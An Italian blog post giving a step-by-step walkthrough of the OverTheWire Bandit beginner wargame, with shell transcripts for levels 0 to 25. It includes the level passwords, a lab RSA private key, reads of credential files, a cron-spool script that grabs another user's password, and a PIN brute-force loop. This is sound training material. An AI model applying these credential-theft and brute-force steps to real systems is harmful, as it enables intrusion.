Forse molti di voi conoscono già il sito overthewire.org. Per chi non lo conoscesse si tratta di un sito di wargame grazie al quale è possibile fare pratica di concetti di sicurezza informatica in forma di piccole sfide. È organizzato in sfide di difficoltà crescente, la prima delle quali è chiamata Bandit.
Il sito overthewire descrive questa sfida nel seguente modo: “The Bandit wargame is aimed at absolute beginners. It will teach the basics needed to be able to play other wargames.“
Di seguito le soluzioni di Bandit.
Livello 0:
#Connessione stef$ ssh bandit0@bandit.labs.overthewire.org
Livello 0 -> 1:
##Soluzione bandit0@melinda:~$ cat boJ9jbbUNNfktd78OOpsqOltutMc3MY1 #Disconnessione bandit0@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 1 -> 2:
stef$ ssh bandit1@bandit.labs.overthewire.org bandit1@melinda:~$ cat ./- CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9 bandit1@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 2 -> 3:
stef$ ssh bandit2@bandit.labs.overthewire.org bandit2@melinda:~$ cat spaces\ in\ this\ filename UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK bandit2@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 3 -> 4:
stef$ ssh bandit3@bandit.labs.overthewire.org bandit3@melinda:~$ ls -a inhere/ . .. .hidden bandit3@melinda:~$ cat inhere/.hidden pIwrPrtPN36QITSp3EQaw936yaFoFgAB bandit3@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 4 -> 5:
stef$ ssh bandit4@bandit.labs.overthewire.org bandit4@melinda:~/inhere$ file ./* ./-file00: data ./-file01: data ./-file02: data ./-file03: data ./-file04: data ./-file05: data ./-file06: data ./-file07: ASCII text ./-file08: data ./-file09: data bandit4@melinda:~/inhere$ cat ./-file07 koReBOKuIDDepwhWk7jZC0RTdopnAYKh bandit4@melinda:~/inhere$ logout stef$
Livello 5 -> 6:
stef$ ssh bandit5@bandit.labs.overthewire.org bandit5@melinda:~$ cd inhere/ bandit5@melinda:~$ find ./ -size 1033c ./inhere/maybehere07/.file2 bandit5@melinda:~$ cat ./inhere/maybehere07/.file2 DXjZPULLxYr17uwoI01bNLQbtFemEgo7 bandit5@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 6 -> 7:
stef$ ssh bandit6@bandit.labs.overthewire.org bandit6@melinda:~$ find / -size 33c -user bandit7 -group bandit6 2>/dev/null /var/lib/dpkg/info/bandit7.password bandit6@melinda:~$ cat /var/lib/dpkg/info/bandit7.password HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs bandit6@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 7 -> 8:
stef$ ssh bandit7@bandit.labs.overthewire.org bandit7@melinda:~$ cat data.txt | grep millionth millionth cvX2JJa4CFALtqS87jk27qwqGhBM9plV bandit7@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 8 -> 9:
stef$ ssh bandit8@bandit.labs.overthewire.org bandit8@melinda:~$ sort data.txt | uniq -u UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR bandit8@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 9 -> 10:
stef$ ssh bandit9@bandit.labs.overthewire.org bandit9@melinda:~$ ls data.txt bandit9@melinda:~$ strings data.txt | grep = epr~F=K 7?YD= ?M=HqAH /(Ne= C=_" I========== the6 z5Y= `h(8=` n\H=; ========== password ========== ism N$=& l/a=L) f=C( ========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk ie)=5e bandit9@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 10 -> 11:
stef$ ssh bandit10@bandit.labs.overthewire.org bandit10@melinda:~$ ls data.txt bandit10@melinda:~$ base64 -d data.txt The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR bandit10@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 11 -> 12:
stef$ ssh bandit11@bandit.labs.overthewire.org bandit11@melinda:~$ ls data.txt bandit11@melinda:~$ cat data.txt Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh bandit11@melinda:~$ tr 'A-Za-z' 'N-ZA-Mn-za-m' < data.txt The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu bandit11@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 12 -> 13:
stef$ ssh bandit12@bandit.labs.overthewire.org bandit12@melinda:/tmp$ cd /tmp bandit12@melinda:/tmp$ mkdir acc123 bandit12@melinda:/tmp$ cd acc123 bandit12@melinda:/tmp/acc123$ cp /home/bandit12/data.txt ./ bandit12@melinda:/tmp/acc123$ ls data.txt #Convertiamo l'hexdump in binario bandit12@melinda:/tmp/acc123$ xxd -r data.txt > data1.txt bandit12@melinda:/tmp/acc123$ ls data.txt data1.txt #Utilizziamo il comando file per vedere con che tipo di file abbiamo a che fare bandit12@melinda:/tmp/acc123$ file data1.txt data1.txt: gzip compressed data, was "data2.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression bandit12@melinda:/tmp/acc123$ mv data1.txt data2.bin.gz bandit12@melinda:/tmp/acc123$ gunzip data2.bin.gz bandit12@melinda:/tmp/acc123$ ls data.txt data2.bin bandit12@melinda:/tmp/acc123$ file data2.bin data2.bin: bzip2 compressed data, block size = 900k bandit12@melinda:/tmp/acc123$ bunzip2 data2.bin bunzip2: Can't guess original name for data2.bin -- using data2.bin.out bandit12@melinda:/tmp/acc123$ ls data.txt data2.bin.out bandit12@melinda:/tmp/acc123$ file data2.bin.out data2.bin.out: gzip compressed data, was "data4.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression bandit12@melinda:/tmp/acc123$ mv data2.bin.out data4.bin.gz bandit12@melinda:/tmp/acc123$ gunzip data4.bin.gz bandit12@melinda:/tmp/acc123$ ls data.txt data4.bin bandit12@melinda:/tmp/acc123$ file data4.bin data4.bin: POSIX tar archive (GNU) bandit12@melinda:/tmp/acc123$ tar -xvf data4.bin data5.bin bandit12@melinda:/tmp/acc123$ file data5.bin data5.bin: POSIX tar archive (GNU) bandit12@melinda:/tmp/acc123$ tar -xvf data5.bin data6.bin bandit12@melinda:/tmp/acc123$ file data6.bin data6.bin: bzip2 compressed data, block size = 900k bandit12@melinda:/tmp/acc123$ bunzip2 data6.bin bunzip2: Can't guess original name for data6.bin -- using data6.bin.out bandit12@melinda:/tmp/acc123$ file data6.bin.out data6.bin.out: POSIX tar archive (GNU) bandit12@melinda:/tmp/acc123$ tar -xvf data6.bin.out data8.bin bandit12@melinda:/tmp/acc123$ file data8.bin data8.bin: gzip compressed data, was "data9.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression bandit12@melinda:/tmp/acc123$ mv data8.bin data9.bin.gz bandit12@melinda:/tmp/acc123$ gunzip data9.bin.gz bandit12@melinda:/tmp/acc123$ ls data.txt data4.bin data5.bin data6.bin.out data9.bin bandit12@melinda:/tmp/acc123$ file data9.bin data9.bin: ASCII text bandit12@melinda:/tmp/acc123$ cat data9.bin The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL bandit12@melinda:/tmp/acc123$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 13 -> 14:
stef$ ssh bandit13@bandit.labs.overthewire.org bandit13@melinda:~$ ls sshkey.private bandit13@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. #Copio la chiave sul computer locale stef$ scp bandit13@bandit.labs.overthewire.org:/home/bandit13/sshkey.private ./Cartella/
Livello 14 -> 15:
stef$ ssh bandit14@bandit.labs.overthewire.org -i ./Cartella/sshkey.private bandit14@melinda:~$ cat /etc/bandit_pass/bandit14 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e #Controlliamo se effettivamente esiste un servizio in ascolto sulla porta 30000 bandit14@melinda:~$ netstat -anp | grep 30000 tcp 0 0 0.0.0.0:30000 0.0.0.0:* LISTEN - #Tentiamo la connessione verso il server locale alla porta 30000 bandit14@melinda:~$ nc localhost 30000 #proviamo a spedire la password trovata in precedenza 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e Correct! BfMYroe26WYalil77FoDi9qh59eK5xNr bandit14@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. MaKeopti:~ stef$ stef$
Livello 15 -> 16:
stef$ ssh bandit15@bandit.labs.overthewire.org
bandit15@melinda:~$ openssl s_client -host localhost -port 30001
CONNECTED(00000003)
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
---
Certificate chain
0 s:/CN=li190-250.members.linode.com
i:/CN=li190-250.members.linode.com
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
[...]
---
No client certificate CA names sent
---
SSL handshake has read 1330 bytes and written 455 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
[...]
Timeout : 300 (sec)
Verify return code: 18 (self signed certificate)
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
HEARTBEATING
read R BLOCK
read:errno=0
#Uso come suggerito l'opzione -quiet
bandit15@melinda:~$ openssl s_client -host localhost -port 30001 -quiet
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd
read:errno=0
bandit15@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$
Livello 16 -> 17:
stef$ ssh bandit16@bandit.labs.overthewire.org
bandit16@melinda:~$ nmap -Pn -A -p 31000-32000 localhost
Starting Nmap 6.40 ( http://nmap.org ) at 2015-01-17 08:42 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00081s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
31046/tcp open echo
31518/tcp open msdtc Microsoft Distributed Transaction Coordinator (error)
31691/tcp open echo
31790/tcp open msdtc Microsoft Distributed Transaction Coordinator (error)
31960/tcp open echo
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.61 seconds
#Le porte indicate come servizio echo probabilmente non ci serviranno e potremmo scartarle a priori.
#In ogni caso, per completezza, proviamo a connetterci alla prima
bandit16@melinda:~$ openssl s_client -host localhost -port 31046
CONNECTED(00000003)
140737354045088:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol:s23_clnt.c:795:
---
no peer certificate available
---
No client certificate CA names sent
---
SSL handshake has read 7 bytes and written 305 bytes
---
New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
---
#Non ci resta che focalizzarci sulle porte 31518 e 31790
bandit16@melinda:~$ openssl s_client -host localhost -port 31518
CONNECTED(00000003)
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
---
Certificate chain
0 s:/CN=li190-250.members.linode.com
i:/CN=li190-250.members.linode.com
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
[...]
---
No client certificate CA names sent
---
SSL handshake has read 1330 bytes and written 455 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
[...]
Timeout : 300 (sec)
Verify return code: 18 (self signed certificate)
---
cluFn7wTiGryunymYOu4RcffSxQluehd
cluFn7wTiGryunymYOu4RcffSxQluehd
^C
#Non ci rimane che provare la connessione sulla porta 31790
bandit16@melinda:~$ openssl s_client -host localhost -port 31790
CONNECTED(00000003)
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
---
Certificate chain
0 s:/CN=li190-250.members.linode.com
i:/CN=li190-250.members.linode.com
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
subject=/CN=li190-250.members.linode.com
issuer=/CN=li190-250.members.linode.com
---
No client certificate CA names sent
---
SSL handshake has read 1330 bytes and written 455 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
[...]
Timeout : 300 (sec)
Verify return code: 18 (self signed certificate)
---
cluFn7wTiGryunymYOu4RcffSxQluehd
Correct!
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
-----END RSA PRIVATE KEY-----
read:errno=0
#Copiamo la chiave privata su un file da poter riutilizzare al livello successivo.
#Nel mio caso il file si chiamerà sshkey-private17
bandit16@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$
Livello 17 -> 18:
stef$ ssh bandit17@bandit.labs.overthewire.org -i ./Cartella/sshkey.private17 bandit17@melinda:~$ diff passwords.old passwords.new 42c42 < BS8bqB1kqkinKJjuxL6k072Qq9NRwQpR --- > kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd #La stringa che cerchiamo è la seconda proposta, segnalata dal simbolo ">" bandit17@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 18 -> 19:
stef$ ssh bandit18@bandit.labs.overthewire.org [...] bandit18@bandit.labs.overthewire.org's password: Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.18.1-x86_64-linode50 x86_64) [...] Byebye ! Connection to bandit.labs.overthewire.org closed. stef$ #Con ssh è possibile eseguire comandi remoti, usando la sintassi #ssh host comando #Rif: http://matt.might.net/articles/ssh-hacks/ stef$ ssh bandit18@bandit.labs.overthewire.org cat readme [...] bandit18@bandit.labs.overthewire.org's password: IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x stef$
Livello 19 -> 20:
stef$ ssh bandit19@bandit.labs.overthewire.org bandit19@melinda:~$ ls bandit20-do bandit19@melinda:~$ ./bandit20-do Run a command as another user. Example: ./bandit20-do id bandit19@melinda:~$ ./bandit20-do cat /etc/bandit_pass/bandit20 GbKksEFF4yrVs6il55v6gwY5aVje5f0j bandit19@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 20 -> 21:
#console 1 stef$ ssh bandit20@bandit.labs.overthewire.org bandit20@melinda:~$ ls suconnect bandit20@melinda:~$ ./suconnect Usage: ./suconnect This program will connect to the given port on localhost using TCP. If it receives the correct password from the other side, the next password is transmitted back. #console 2 stef$ ssh bandit20@bandit.labs.overthewire.org bandit20@melinda:~$ nc -l 7890 #console 1 bandit20@melinda:~$ netstat -apn | grep 7890 tcp 0 0 0.0.0.0:7890 0.0.0.0:* LISTEN 4399/nc bandit20@melinda:~$ ./suconnect 7890 #Console 2. Spediamo la vecchia password GbKksEFF4yrVs6il55v6gwY5aVje5f0j #Console 1 Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j Password matches, sending next password bandit20@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. MaKeopti:bing-ip2hosts-0.4 stef$ #Console 2. Riceviamo la risposta con la nuova password gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr bandit20@melinda:~$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 21 -> 22:
stef$ ssh bandit21@bandit.labs.overthewire.org bandit21@melinda:~$ cd /etc/cron.d bandit21@melinda:/etc/cron.d$ ls behemoth4_cleanup manpage3_resetpw_job natas27_cleanup sysstat cron-apt melinda-stats php5 vortex0 cronjob_bandit22 natas-session-toucher semtex0-32 vortex20 cronjob_bandit23 natas-stats semtex0-64 cronjob_bandit24 natas25_cleanup semtex0-ppc leviathan5_cleanup natas26_cleanup semtex5 bandit21@melinda:/etc/cron.d$ cat cronjob_bandit22 * * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null bandit21@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh #!/bin/bash chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv bandit21@melinda:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI bandit21@melinda:/etc/cron.d$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 22 -> 23:
stef$ ssh bandit22@bandit.labs.overthewire.org bandit22@melinda:~$ cd /etc/cron.d/ bandit22@melinda:/etc/cron.d$ ls behemoth4_cleanup manpage3_resetpw_job natas27_cleanup sysstat cron-apt melinda-stats php5 vortex0 cronjob_bandit22 natas-session-toucher semtex0-32 vortex20 cronjob_bandit23 natas-stats semtex0-64 cronjob_bandit24 natas25_cleanup semtex0-ppc leviathan5_cleanup natas26_cleanup semtex5 bandit22@melinda:/etc/cron.d$ cat cronjob_bandit23 * * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null bandit22@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh #!/bin/bash myname=$(whoami) mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1) echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget" cat /etc/bandit_pass/$myname > /tmp/$mytarget #troviamo il valore della variabile mytarget bandit22@melinda:/$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1 8ca319486bfbbc3663ea0fbe81326349 #visualizziamo il file bandit22@melinda:/$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349 jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n bandit22@melinda:/$ logout Connection to bandit.labs.overthewire.org closed. stef$
Livello 23 -> 24:
stef$ ssh bandit23@bandit.labs.overthewire.org
bandit23@melinda:~$ cd /etc/cron.d
bandit23@melinda:/etc/cron.d$ ls
behemoth4_cleanup manpage3_resetpw_job natas27_cleanup sysstat
cron-apt melinda-stats php5 vortex0
cronjob_bandit22 natas-session-toucher semtex0-32 vortex20
cronjob_bandit23 natas-stats semtex0-64
cronjob_bandit24 natas25_cleanup semtex0-ppc
leviathan5_cleanup natas26_cleanup semtex5
bandit23@melinda:/etc/cron.d$ cat cronjob_bandit24
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in *;
do
echo "Handling $i"
./$i
rm -f $i
done
bandit23@melinda:/etc/cron.d$ mkdir /tmp/stef
bandit23@melinda:/etc/cron.d$ cd /tmp/stef
bandit23@melinda:/tmp/stef$ touch script.sh
bandit23@melinda:/tmp/stef$ vi script.sh
#Creo uno script bash. Di seguito il cat dello script
bandit23@melinda:/tmp/stef$ cat script.sh
#!/bin/bash
myname=$(whoami)
myfile="/tmp/stef/password$myname.txt"
echo "The password for user $myname is the following:" > $myfile
cat /etc/bandit_pass/$myname >> $myfile
#Occorre dargli gli attributi opportuni alla cartelle e i file contenuti
bandit23@melinda:/tmp/stef$ chmod 777 -R /tmp/stef
bandit23@melinda:/tmp/stef$ ls -l
total 4
-rwx--x--x 1 bandit23 bandit23 178 Jan 18 16:10 script.sh
#Ora testiamo lo script, dovremmo avere le info per l'utente che esegue il file,
#per ora l'utente bandit23
bandit23@melinda:/tmp/stef$ ./script.sh
bandit23@melinda:/tmp/stef$ ls
passwordbandit23.txt script.sh
bandit23@melinda:/tmp/stef$ cat passwordbandit23.txt
The password for user bandit23 is the following:
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
#A questo punto tutto dovrebbe essere pronto per utilizzare lo script per l'utente bandit24
bandit23@melinda:/tmp/stef$ cp script.sh /var/spool/bandit24/
bandit23@melinda:/tmp/stef$ ls
passwordbandit23.txt passwordbandit24.txt script.sh
bandit23@melinda:/tmp/stef$ cat passwordbandit24.txt
The password for user bandit24 is the following:
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
bandit23@melinda:~$ cd
bandit23@melinda:~$ rm -rf /tmp/stef
bandit23@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$
Livello 24 -> 25:
stef$ ssh bandit24@bandit.labs.overthewire.org #Controlliamo che in effetti un server sia ascolto sulla porta indicata bandit24@melinda:~$ netstat -ln | grep 30002 tcp 0 0 0.0.0.0:30002 0.0.0.0:* LISTEN bandit24@melinda:~$ cd /tmp/stef bandit24@melinda:/tmp/stef$ ls bandit24@melinda:/tmp/stef$ touch scriptLev24.sh bandit24@melinda:/tmp/stef$ chmod +x scriptLev24.sh bandit24@melinda:/tmp/stef$ cat scriptLev24.sh #!/bin/bash lvl23psw="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ" outputfile="outputlvl24.txt" #For more info search "Zero padding" for i in $(seq -f "%04g" 0 9999) do echo "using code $i" | tee -a $outputfile echo "$lvl23psw $i" | nc localhost 30002 | tee -a $outputfile done echo "done" bandit24@melinda:/tmp/stef$ ./scriptLev24.sh #Dopo qualche tempo le script troverà la password: I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space. Correct! The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Blog di Stefano Carli 